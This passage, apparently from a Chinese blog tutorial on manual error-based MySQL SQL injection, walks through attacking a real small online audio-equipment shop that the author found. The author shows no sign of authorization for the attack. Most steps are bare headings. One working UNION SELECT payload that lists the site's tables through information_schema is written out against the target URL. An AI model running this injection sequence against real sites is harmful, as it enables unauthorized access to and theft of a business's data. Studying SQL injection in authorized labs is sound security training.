0x03 MYSQL 手工注入实战——基于错误的 SQL 注入
今天如愿以偿的找到了基于错误的SQL注入环境了:是一个国外卖音响的小网站,还在建设中:
看一下报错信息:
(1)确定闭合语句:从上面的报错信息来看,这里应该是不需要闭合即可注入
(2)order by 查询字段数:
(3)确定数据可显位置:
(4)先来一句素质三连(数据库名、用户名、数据库版本):
(5)查询当前数据库的所有表:
http://xxx/xx.php?id=4 union select 1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13 from information_schema.tables where table_schema=database()--+
(6)查询指定数据表中的所有字段名:
(7)查询指定字段的所有内容: